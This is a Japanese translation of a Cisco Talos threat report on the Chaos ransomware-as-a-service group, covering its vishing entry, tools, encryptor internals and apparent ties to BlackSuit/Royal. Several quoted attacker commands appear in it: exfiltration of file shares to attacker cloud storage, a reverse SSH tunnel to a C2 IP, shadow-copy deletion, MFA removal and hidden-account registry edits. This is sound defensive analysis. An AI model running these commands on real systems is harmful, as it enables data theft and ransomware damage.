- Cisco Talos インシデント対応チーム(Talos IR)はこのほど、比較的新しい Ransomware as a Service(RaaS)グループである Chaos による攻撃を確認しました。同グループは、大物狩り(Big-game Hunting)と二重脅迫攻撃を行っています。
- Chaos RaaS グループの攻撃は、手間のかからないスパムメールの大量送信から始まり、次に音声によるソーシャルエンジニアリングでアクセスを確立します。さらに、RMM(リモート監視・管理)ツールを悪用して持続的接続を確保し、正規のファイル共有ソフトウェアを使ってデータを持ち出します。
- Chaos ランサムウェアは、マルチスレッド処理による高速かつ選択的な暗号化と分析回避技術を組み合わせ、ローカルおよびネットワークの両方のリソースを標的とすることで、検出や復旧を遅らせつつ被害を最大化します。
- Talos は、新たな Chaos ランサムウェアは、Chaos ビルダーで作成された以前の亜種とは無関係だと考えています。その理由は、混乱を引き起こす目的で同じ名称を使用しているからです。
- Talos は、この新しいグループは BlackSuit(Royal)犯罪者集団の元メンバーで構成されていると中程度の確信を持って判断しています。その根拠は、攻撃で使用されるランサムウェアの暗号化方式、身代金要求メッセージの内容、ツールセットに共通点が見られることです。
被害状況
新たに登場した Chaos は幅広い業界に影響を及ぼしており、特定の業界に絞ることなく攻撃の機会をうかがっているようです。被害の多くは米国で発生しています。攻撃者のデータリークサイトによると、比較的件数は少ないものの、英国、ニュージーランド、インドでも被害者が出ています。
Chaos とは
Chaos は比較的新しい RaaS グループであり、2025 年 2 月には活動していました。同グループは、ダーク Web 上のロシア語サイバー犯罪者フォーラムである Ransom Anon Market Place(RAMP:身代金匿名マーケットプレイス)で、自らのクロスプラットフォーム型ランサムウェアソフトウェアを積極的に宣伝し、アフィリエイトとの協力を模索しています。強調されているのは、新しい Chaos ランサムウェアソフトウェアが Windows、ESXi、Linux、NAS の各システムに対応しており、個別のファイル暗号化キー、高速暗号化速度、ネットワーク リソース スキャンなどの機能を有していて、そのすべてにおいて高速暗号化と堅牢なセキュリティ対策に重点を置いている点です。
さらに同グループは、標的やコミュニケーションを管理するための自動化パネルも提供しています。これには登録料がかかりますが、最初の支払いが発生次第、返金される仕組みになっています。また、同グループがダーク Web 上のフォーラムに投稿した内容には、BRICS/CIS 諸国、病院、政府機関を標的にするのを避けていることが明示的に示されています。
そのほか、潜在的なアフィリエイトが Chaos グループにアカウント登録するための Onion URL も提供しており、サポート用のメールアドレスとして「win88@thesecure[.]biz」を案内しています。
Talos IR は、同グループが大物狩りと二重脅迫攻撃を展開していることを確認しました。二重脅迫攻撃を行う他のグループと同様に、Chaos も、被害者が身代金要求に応じない場合に盗んだデータを公開するデータリークサイトを運営しています。
図 2. Chaos のデータリークサイトのホームページ
Chaos は被害者の環境を暗号化する際、暗号化されたファイルの拡張子として「.chaos」を使用し、身代金要求メッセージ「readme.chaos[.]txt」を残します。その身代金要求メッセージで、被害者の環境でセキュリティテストを試行したのち侵害に成功したと伝え、身代金の支払いに応じない場合は、窃取した機密データを公開すると脅迫します。メッセージには、身代金要求や支払いに関する指示は記載せず、被害者ごとに固有の Onion URL を使用して連絡をとるよう指示しています。
図 3. Chaos の身代金要求メッセージ
Talos IR は、攻撃者が被害者との連絡チャネルを通じて 30 万ドルの身代金を要求し、選択肢を 2 つ提示したことを確認しました。身代金を支払った場合は、攻撃対象となった環境を復号するツールと、被害者の環境で実施したペネトレーションテストの詳細なレポートを提供するとしています。また、盗んだデータは公開せず完全に削除し、繰り返し攻撃することはないと保証しています。
身代金を支払わない場合は、盗んだデータを公開するだけでなく、被害者が利用するインターネットサービス全体を対象に分散型サービス妨害(DDoS)攻撃を仕掛け、さらにデータ漏洩について競合他社や顧客に情報を拡散すると脅迫しています。
図 4. Chaos グループの要求内容
Chaos ランサムウェア攻撃グループは、進化する脅威環境において新たに出現した懸念すべき脅威です。現在確認されている一連の攻撃が始まる以前は、その活動はほとんど報告されていません。重要なのは、この新たな Chaos ランサムウェア犯罪グループが、Chaos ランサムウェアのビルダーツールやその開発者が作成した亜種とは無関係であるという点です。攻撃者は、「Chaos」という名称やその亜種、および関連するビルダーツールを巡るセキュリティコミュニティ内の混乱に乗じて、身元を隠しています。この意図的に生み出された混乱が、新たな脅威によるリスクの特定と軽減をより複雑にしています。
図 5. Chaos の RaaS ダイヤモンドモデル
最近の攻撃手法と注目すべき TTP
Chaos ランサムウェア攻撃の調査中、Talos IR チームは注目に値するいくつかの TTP を確認しました。
初期アクセス
T1598.004 – 情報のフィッシング:音声フィッシング(ビッシング)
攻撃者は、被害者への初期アクセスをソーシャルエンジニアリングを通じて得ており、フィッシングと音声フィッシングの手法を使用しています。まず、被害者に大量のスパムメールを送りつけ、被害者が攻撃者と電話で連絡をとるように仕向けます。被害者が電話をかけると、IT セキュリティ担当者になりすました攻撃者が、被害者の Windows マシンに搭載されているリモートアシスタンスツール(具体的には Microsoft Quick Assist)を起動するよう助言し、次に、攻撃者のセッションに接続するよう指示します。
検出
Talos IR は、侵入後に検出や偵察を行うために、攻撃者が被害者環境内で複数のコマンドを実行したことを確認しました。攻撃者は、ドメインコントローラや信頼関係、ログインユーザーデータ、実行中のプロセスといったネットワーク構成の詳細を収集するほか、逆引き DNS ルックアップも実行します。
ipconfig /all nltest /dclist nltest.exe /domain_trusts nltest.exe /dclist:$domain nslookup $Internal_IP_address net view \$Internal_IP /all quser.exe tasklist.exe
実行
T1059.001 – PowerShell T1059 – コマンドおよびスクリプトインタープリタ
T1047 – Windows Management Instrumentation
攻撃者は、被害者のマシンでスクリプトとコマンドを実行して以下のアクションを行い、悪意のあるファイルをダウンロード・実行し、攻撃者のコマンドアンドコントロール(C2)サーバーに接続するための環境を整えました。
- 攻撃者は、被害者のマシン上で作業環境を設定するために、以下の PowerShell コマンドを実行します。
powershell.exe -noexit -command Set-Location -literalPath 'C:\Users\$user\Desktop'
- 攻撃者は、被害者のネットワーク内で侵害したすべてのマシンに対して以下のコマンドを実行し、Windows の配信最適化を設定します。これにより、ポート 8005 を使用するローカルサーバーから 50 MB を超えるファイルのダウンロードが可能になり、サイズの大きいファイルをピアサーバーから効率的に取得できるようになります。
PowerShell.exe -Nologo -Noninteractive - NoProfile -ExecutionPolicy Bypass; Get-DeliveryOptimizationStatus | where-object {($.Sourceurl -CLike 'hxxp[://]localhost[:]8005*') -AND (($.FileSize -ge '52428800') -or ($.BytesFromPeers -ne '0') -or (($.BytesFromCacheServer -ne '0') -and ($_.BytesFromCacheServer -ne $null)))} | select-object -Property BytesFromHttp, FileId, BytesFromPeers,Status,BytesFromCacheServer,SourceURL | ConvertTo-Xml -as string - NoTypeInformation
- また、リモートでコマンドを実行するにあたり、Impacket ツールキットの「atexec」ツールを使用したことも確認しました。
永続化
T1547.001 – 起動時またはログオン時の初期化:レジストリの実行キー/スタートアップフォルダ
Talos IR は、攻撃者が被害者のネットワークに持続的に接続する目的で、AnyDesk、ScreenConnect、OptiTune、Syncro RMM、Splashtop Streamer などの RMM ツールを侵害されたマシンにインストールしたことを確認しました。
攻撃者は、Windows のレジストリ設定を変更するコマンドを実行し、Windows ログイン画面からユーザーアカウントを非表示にしていました。このレジストリ設定により、ユーザーアカウントは存在し続け、Remote Desktop Protocol(RDP)や runas を使用してログインできる一方、ウェルカム画面やログイン画面にユーザー名が表示されなくなります。
cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist /v $user_account /t REG_DWORD /d 0 /f
さらに攻撃者は、被害者のマシンへの継続的なアクセスを維持するために、net[.]exe ユーティリティを使用して、被害者ネットワーク内で列挙したドメインユーザーアカウントのパスワードをリセットしています。
net[.]exe user $user_name $password /dom
ログイン情報へのアクセスと特権昇格
Talos IR は、攻撃者がリバース SSH トンネルを介して、被害者のマシン上で「ldapsearch」コマンドをリモートから実行し、Active Directory のユーザー詳細情報をテキストファイルにダンプしたことを確認しました。攻撃者は、Kerberoasting 手法を使用して、被害者の Active Directory 内の特権アカウントのログイン情報を盗み取ろうとした可能性があります。これによって、被害者の環境で昇格された特権アクセスを取得できます。
防御の回避
T1562.001 – 防御策の妨害:ツールの無効化または設定変更
Talos IR は、攻撃者がセキュリティ管理を回避するために、被害者のマシン上の PowerShell イベントログを削除したことを確認しました。また、Windows Management Instrumentation Commands(WMIC)を使用して、被害者のマシンからセキュリティや多要素認証のアプリケーションをアンインストールしようとしたことも判明しました。
cmd.EXE /c wmic product where name=$MFA_application for Windows Logon x64 call uninstall /nointeractive
ラテラルムーブメント
T1021.001 – リモートサービス:Remote Desktop Protocol(RDP)
Talos IR は、攻撃者が被害者のネットワークでラテラルムーブメントを行うために、RDP クライアントと Impacket を利用し、サーバーメッセージブロック(SMB)と Windows Management Instrumentation(WMI)を介したコマンド実行を簡易化していることを突き止めました。
mstsc.exe /v:$remote machine hostname wmic /node:$host process call create “C:\Users\encryptor[.]exe /lkey:"$32-bytekey" /encrypt_step:40 /work_mode:local_network”
データの収集と漏洩
T1059.003 – コマンドおよびスクリプトインタープリタ:Windows コマンドシェル
調査の結果、広く普及しているファイル同期とバックアップの正規ソフトウェアである GoodSync が、被害者のマシンからデータを抽出するために使用されたことが明らかになりました。
攻撃者は、正規の Windows 実行ファイル「wininit[.]exe」を装ったファイル同期・クラウドアップロードツールを使用してコマンドを実行しています。目的は、ネットワークファイル共有から攻撃者が管理するリモートのクラウド ストレージ ロケーションにデータをコピーすることです。
このコマンドでは、過去 1 年以内に変更されたファイルのみが対象となるように被害者のマシン上のファイルがフィルタリングされ、数種類のファイルタイプが除外されます。これはおそらく、検出のトリガーとなる可能性がある、サイズの大きなファイルや機密性の高いファイルを避けることが目的だと思われます。除外対象は、Adobe Photoshop ドキュメント、7-Zip 圧縮アーカイブ、Microsoft Outlook ファイル、画像・音声ファイル、一般的なデータベースファイル、ログファイル、一時ファイル、Hyper-V 仮想ハードディスクファイル、Microsoft Installer パッケージ、実行ファイル、ダイナミックリンク ライブラリ ファイル、ディスクイメージファイルです。
Wininit[.]exe copy --max-age 1y --exclude
*{psd,7z, mox,pst,FIT, FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi}
[\\]FS01[\]data cloud1:basket123/data -q --ignore-existing --auto-confirm --multi-
thread-streams 25 --transfers 15 --b2-disable-checksum -P
コマンドアンドコントロール
攻撃者は、Windows OpenSSH クライアントを使用してコマンドを実行し、被害者のマシンから C2 サーバー(IP アドレスは「45[.]61[.]134[.]36」)へのリバース SSH トンネルを確立しています。使用されていたポートは、デフォルトの SSH ポートではなく、ポート 443 です。また、ホストキーを「known_hosts」ファイルに保存しないことで、SSH フィンガープリントのチェックを無効化しようとしていました。攻撃者がリモートポート転送を設定しようとした形跡もあり、リモートサーバーのポート 12840 が、ローカルの被害者のマシンのポート 12840 に転送されるようになっていました。
C:\WINDOWS\System32\OpenSSH\ssh[.]exe -R :12840 -N userconnectnopass@45[.]61[.]134[.]36 -p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no
影響
調査中に、被害者の環境で暗号化コマンドが実行された証拠を確認しました。ランサムウェアは、被害者のマシン上の一部のファイルを対象に選択的に暗号化を行い、実行速度を高めています。暗号化されたファイルには、「.chaos」のファイル拡張子が付加されます。
Chaos の Windows 暗号化コマンド:
C:\Users\$filename[.]exe /lkey:"32-byte key" /encrypt_step:40 /work_mode:local_network
Chaos ランサムウェア暗号化ツールの分析
新しい Chaos ランサムウェアは、ローカルリソースだけでなく、ネットワーク全体のリソースも対象としてファイルを暗号化する機能を備えています。検出を回避するための分析回避技術を用いているほか、マルチスレッド処理によって暗号化の時間を短縮しています。こうした設計の目的は、標的組織への影響を最大化しつつ、ステルス性を保ちながら復旧を妨げる機能を組み込むことにあります。
Talos は、Windows バージョンの Chaos ランサムウェア暗号化ツールのサンプル(32 ビットの実行ファイル)を複数発見しました。2025 年 2 月、3 月、5 月にコンパイルされていることから、Chaos グループが活発に活動していることが示唆されています。
このセクションでは、Windows マシンを標的とする際に使用される新しい Chaos ランサムウェア暗号化ツールの機能について説明します。
分析回避技術
Chaos ランサムウェアには多層的な分析回避技術が実装されており、デバッグツールや仮想マシン環境、自動サンドボックス、セキュリティ分析プラットフォームといった多様な分析ツールを、ウィンドウの列挙、プロセスモニタリング、タイミング分析の手法を用いて体系的に特定し、回避します。具体的には次のとおりです。
- 特にデバッグ環境を対象として、デバッガアプリケーションのウィンドウと一致するウィンドウクラスとタイトルパターンを列挙し、検出します。
- プロセス列挙とウィンドウクラス検出の両方の手法を用いて、仮想マシンとサンドボックス環境を検出します。
- プロセス列挙を使用して、脅威とマルウェアの分析に使用される各種セキュリティ・監視ツールを検出します。
これらすべての検出回避技術は、静的分析で検出される可能性のあるプレーンテキストのツール名の保存を避けるために、事前に計算されたシグネチャとのハッシュベースの比較を用いてランサムウェアに実装されています。マルウェアは、分析環境を検出すると即座に実行を終了し、分析を阻止する設計になっています。
設定と初期化
回避に成功すると、ランサムウェアは攻撃中に提供されるコマンドライン設定パラメータを解析します。以下に、暗号化コマンドの例を示しています。
Encryptor[.]exe /lkey:"32-byte key" /encrypt_step:$0-100 /work_mode:$mode /ignorar_arquivos_grandes
- 32 バイトの暗号化キー(「lkey」)
- 対象ディレクトリのパス(「path」)
- 選択的暗号化のパーセンテージ(「encrypt_step」、デフォルトは 30%)
- 動作モード(「work_mode」、local、network、この両方を組み合わせた local_network をサポート)
- サイズが大きいファイルの処理オプション(「ignorar_arquivos_grandes」)
図 6. 暗号化設定のコマンドラインパラメータを解析する関数のスニペット
同時に、ランサムウェアは Windows の「システムの復元」によるファイルのリカバリを阻止するために、シャドウコピーを削除する難読化されたシステムコマンドを実行します。コマンドの各文字はバイナリ内にバイト値として保存されており、後ろには 0x0E が付加されています。そして、スクリーンショットで示したように、カスタムアルゴリズムを用いて実行時に復号されます。
以下に、復号されたボリュームシャドウコピー削除コマンドを示しています。
cmd.exe /c vssadmin to delete shadows /all
図 7. ボリュームシャドウコピー削除コマンドを復号して実行する関数のスニペット
暗号化アルゴリズムとプロセス
ランサムウェアは、Curve25519 による楕円曲線 Diffie-Hellman(ECDH)を用いた非対称暗号化と、AES-256 による対称ファイル暗号化を組み合わせたハイブリッド暗号化技術を採用しています。
実行ごとに、ランサムウェアは Windows CNG(Cryptography Next Generation)を使用して一意の ECC キーペアを生成します。秘密キーはメモリに保持され、公開キーは ECCPUBLICBLOB 形式でエクスポートされます。ファイル固有の暗号化キーは、攻撃者が管理する 32 バイトのマスターキーと、暗号化の反復処理ごとに生成される別のキーを組み合わせた ECDH キー合意から導出され、各ファイルが一意の暗号化キーを受け取るようになっています。
図 8. 暗号化プロバイダーを初期化する関数
Chaos ランサムウェアは、local、network、local_network(両方)の 3 種類の暗号化モードに対応しています。
local 暗号化モードでは、感染マシン上で対象に設定したファイルのみを暗号化するようにランサムウェアが設定されます。暗号化の開始時、まず通常のアクセスを確立しようとしますが、標準アクセスの取得に失敗すると、セキュリティ記述子を変更して権限を昇格させてから、トークン偽装を実行します。これを成し遂げるために、svchost.exe や explorer.exe などのシステムプロセスを列挙し、続いてプロセストークンを開きます。この方法により、ランサムウェアは高権限のセキュリティコンテキストを偽装し、被害者のマシン上で効果的にファイルのアクセス制限をバイパスします。
図 9. Chaos ランサムウェアの特権昇格関数
ランサムウェアは、システムの不安定化を防ぐため、システムの重要なフォルダやファイルを除外しながら、ユーザーが作成したドキュメントを標的として再帰的なディレクトリトラバーサルを実行します。Windows マシンで、Chaos ランサムウェアが暗号化から除外するフォルダは以下のとおりです。
- システムフォルダ:Windows フォルダ、起動フォルダ、システムボリューム情報フォルダ、perflogs フォルダ
- ブラウザデータ:Mozilla、google、Tor ブラウザ
- アプリケーション ディレクトリ:Appdata、msocache、intel
- メンテナンスフォルダ:$recycle.bin、windows.old、$windows.~ws、$windows.~bt
Windows マシンで、Chaos ランサムウェアが暗号化から除外するファイルは以下のとおりです。
- 起動ファイル:bootsect.bak、boot.ini、ntldr、bootfont.bin
- システムファイル:ntuser.dat、autorun.inf、desktop.ini、ntuser.ini、ntuser.dat.log
- 診断ファイル:diagpkg、diagcab、diagcfg
- テーマファイル:msstyles、themepack、deskthemepack、theme
- その他のファイル:Icns、lock、nomedia、およびファイル拡張子のないファイル
- すでに暗号化されているファイル:*.chaos 拡張子
network 暗号化モードでは、ランサムウェアはネットワーク検出を実行します。具体的には、ローカル ネットワーク インターフェイスを列挙し、プライベート IP アドレス範囲を特定して、検出したサブネット内のすべてのホストについて対象リストを生成します。その後、検出したマシンに SMB を使用して接続し、管理共有(ADMIN$、C$、IPC$)を除外しながら、暗号化対象のネットワーク共有を列挙してキューに追加します。この手法によって、ランサムウェアが企業のインフラ全体に拡散し、共有ドライブ、ネットワーク接続ストレージ、分散ファイルシステムが暗号化される可能性が生まれます。こうなると、攻撃の影響は絶大です。
Chaos ランサムウェアは、攻撃時に指定されるコマンドライン設定パラメータ「/encrypt_step」に基づいて、選択的に暗号化を実行します。ファイルを完全に破損させつつ、暗号化速度を最適化するために、暗号化の開始位置となる特定のファイルオフセットが計算されます。暗号化された各ファイルには、ECCPUBLICBLOB 形式の公開キーと、他の暗号化パラメータ(アルゴリズム識別子やキーのデータサイズなど)を含む 60 バイトのメタデータが付加され、ファイルの拡張子が「.chaos」に変更されます。
図 10. 「.chaos」ファイル拡張子を初期化する暗号化関数のスニペット
身代金要求メッセージの展開とクリーンアップ
ランサムウェアは、カスタムの XOR 暗号と 25 バイトのキーを使用して身代金要求メッセージを復号します。復号した要求メッセージ用にマシンのメモリに 1310 バイト(0x51E)を確保し、単純な XOR 演算を難読化するために複雑なオフセット計算を用います。暗号化されたデータは、25 バイトのキーから導出された独自の XOR パターンを使い、5 バイトごとに復号されます。復号された身代金要求メッセージは、「readme[.]chaos[.]txt」ファイルに書き込まれます。
以下は、身代金要求メッセージの XOR 復号に使用される 25 バイトのキーです。
e2 80 9a d0 a3 28 65 d1 97 d0 b9 d0 94 09 3e d1 85 d1 86 1d 01 e2 80 b9 e2
図 11. 身代金要求メッセージ復号関数のスニペット
暗号化が完了すると、ランサムウェアはクリーンアップの手順を実行します。この手順には、ワーカースレッドの終了、メモリバッファの解放、暗号化リソースの解放、ネットワーク接続のクリーニング、ファイルハンドルの終了、プロセスの終了が含まれ、プログラムが正しく終了するようにします。
Chaos の TTP と BlackSuit(Royal)ランサムウェアの TTP との共通点
Talos は、新たに出現した Chaos ランサムウェアグループについて、BlackSuit(Royal)ランサムウェアが改名したグループ、あるいはその元メンバーの一部が運営しているグループのいずれかであると、中程度の確信を持って評価しています。この評価は、暗号化コマンド、身代金要求メッセージのテーマと構造、LOLbin と RMM ツールの使用など、TTP に見られる類似性に基づいています。
Talos IR は、Chaos の攻撃者が暗号化プロセスにおいて設定パラメータ(「lkey」、「encrypt_step」、「work_mode」など)を使用していることを確認しました。この設定により、被害者の環境内でローカルとネットワークの両リソースを選択的に暗号化できるようになります。
Enc.exe /lkey:"<32-byte key>" /encrypt_step:40 /work_mode:local_network
外部のセキュリティレポートによると、同様の暗号化手法の使用が、過去の Royal および BlackSuit ランサムウェア攻撃でも確認されています。使用された暗号化パラメータ名は異なっているようですが、動作は同じです。
この表は、新しい Chaos と BlackSuit(Royal)ランサムウェアに見られる暗号化パラメータの類似性を示したものです。
| Chaos | BlackSuit(Royal) | 目的 |
| /lkey | -id | 32 バイトのキー |
| /encrypt_step | -ep | 暗号化対象の各ファイルのうち、暗号化する部分 / パーセンテージの定義 |
| /kill_vms | -stopvm | 標的のシステムで動作している仮想マシンの停止 |
Chaos ランサムウェアの身代金要求メッセージは、Royal/BlackSuit のものとテーマや構造が似ています。具体的な共通点は、挨拶文、セキュリティテストへの言及、二重脅迫メッセージ、データ機密性の保証、連絡用の Onion URL です。
図 12. BlackSuit ランサムウェアの身代金要求メッセージ
図 13. Royal ランサムウェアの身代金要求メッセージ
Talos はさらに、Chaos ランサムウェア攻撃で用いられた手法と、BlackSuit ランサムウェアの TTP との間に共通点があることも確認しました。BlackSuit(Royal)ランサムウェアの TTP は、CISA の StopRansomware アドバイザリで報告されています。
カバレッジ
今回の脅威は、以下の製品で検出してブロックすることが可能です。
Cisco Secure Endpoint(旧 AMP for Endpoints)は、この記事で説明したマルウェアの実行を阻止するのに最適です。Cisco Secure Endpoint の無料トライアルはこちらからお申し込みください。
Cisco Secure Email(旧 E メールセキュリティ)は、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。Cisco Secure Email の無料トライアルはこちらからお申し込みください。
Threat Defense Virtual、適応型セキュリティアプライアンス、Meraki MX など、Cisco Secure Firewall(旧次世代ファイアウォールおよび Firepower NGFW)アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。
Cisco Secure Network/Cloud Analytics(Stealthwatch/Stealthwatch Cloud)は、ネットワークトラフィックを自動的に分析し、接続されているすべてのデバイスで、望ましくない可能性があるアクティビティをユーザーに警告します。
Cisco Secure Malware Analytics(Threat Grid)は、悪意のあるバイナリを特定し、シスコのすべてのセキュリティ製品に保護機能を組み込みます。
Cisco Secure Access は、ゼロトラストの原則に基づいて構築された、最新のクラウド提供型セキュリティサービスエッジ(SSE)です。Cisco Secure Access はユーザーがどこで作業していても、インターネット、クラウドサービス、プライベート アプリケーションへのシームレスかつ透過的でセキュアなアクセスを提供します。
Cisco Secure Access の無料トライアルにご興味をお持ちの場合は、シスコのアカウント担当者または認定パートナーまでお問い合わせください。
Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。
Cisco Secure Web Appliance(旧 Web セキュリティアプライアンス)は、危険性のあるサイトを自動的にブロックし、ユーザーがアクセスする前に疑わしいサイトを検査します。
特定の環境および脅威データに対する追加の保護機能は、Firewall Management Center から入手できます。
Cisco Duo は、ユーザーに多要素認証を提供し、承認されたユーザーのみがネットワークにアクセスできるようにします。
オープンソースの Snort サブスクライバルールセットをお使いであれば、Snort.org で購入可能な最新のルールパックをダウンロードすることで、最新状態を維持できます。
これらの脅威の Snort SID は次のとおりです。
- Snort2:65125、65126
- Snort3:301273
ClamAV でも、次の脅威を検出できます。
- Win.Ransomware.Chaos-10045485-0
侵害の指標(IOC)
この脅威の IOC は、こちらの GitHub リポジトリで提供しています。
本稿は 2025 年 7 月 24 日にTalos Group
Authors